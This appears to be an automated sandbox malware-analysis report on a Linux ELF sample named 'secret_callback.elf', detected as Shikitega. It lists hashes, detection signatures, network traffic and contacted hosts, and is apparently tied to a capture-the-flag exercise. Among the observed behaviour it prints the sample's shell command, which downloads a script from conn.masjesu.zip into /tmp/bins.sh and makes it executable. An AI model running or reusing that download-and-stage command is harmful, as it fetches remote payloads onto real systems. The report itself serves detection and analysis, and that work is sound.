Linux Analysis Report
secret_callback.elf

General Information

Sample name: secret_callback.elf
Analysis ID: 1686590
Has dependencies: false
MD5: c4e59526ee249153efb3fe9f9afc0933
SHA1: 2392aeac2a203ce1c94124bb9a61e67e82a35f2c
SHA256: dc8721efdf3cc1e6a275eea7d717930289eff30c49dba8ffd47711fb8d85fa2e
Tags: elfuser-hadi
Infos: yara

Detection

Shikitega
Score: 56
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Yara detected Shikitega
Creates hidden files and/or directories
Executes commands using a shell command-line interpreter
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Reads the 'hosts' file potentially containing internal network hosts
Sample contains only a LOAD segment without any section mappings
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: secret_callback.elf Virustotal: Detection: 21% Perma Link
Source: secret_callback.elf ReversingLabs: Detection: 25%
Reads the 'hosts' file potentially containing internal network hosts
Source: /usr/bin/curl (PID: 6244) Reads hosts file: /etc/hosts Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu HTTP/1.1Host: conn.masjesu.zipUser-Agent: curl/7.68.0Accept: */*Cookie: result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D
Source: global traffic DNS traffic detected: DNS query: conn.masjesu.zip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 10 May 2025 06:16:08 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.22.1</center></body></html>
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Sample contains only a LOAD segment without any section mappings
Source: LOAD without section mappings Program segment: 0x8048000
Source: classification engine Classification label: mal56.troj.linELF@0/1@2/0
Creates hidden files and/or directories
Source: /usr/bin/curl (PID: 6244) Directory: /root/.curlrc Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/secret_callback.elf (PID: 6243) Shell command executed: /bin/sh -c "curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b 'result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D' -o /tmp/bins.sh 2>/dev/null && chmod +x /tmp/bins.sh" Jump to behavior
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Source: /bin/sh (PID: 6244) Curl executable: /usr/bin/curl -> curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D -o /tmp/bins.sh Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /usr/bin/curl (PID: 6244) Queries kernel information via 'uname': Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Shikitega
Source: Yara match File source: secret_callback.elf, type: SAMPLE

Remote Access Functionality
barindex
Yara detected Shikitega
Source: Yara match File source: secret_callback.elf, type: SAMPLE
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
94.26.90.14
 unknown Bulgaria 61317 ASDETUKhttpwwwheficedcomGB false
163.5.159.12
 conn.masjesu.zip France 56339 EPITECHFR false
109.202.202.202
 unknown Switzerland 13030 INIT7CH false
91.189.91.43
 unknown United Kingdom 41231 CANONICAL-ASGB false
91.189.91.42
 unknown United Kingdom 41231 CANONICAL-ASGB false

Contacted Domains

Name IP Active
conn.masjesu.zip 163.5.159.12 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu false
  • Avira URL Cloud: malware
 unknown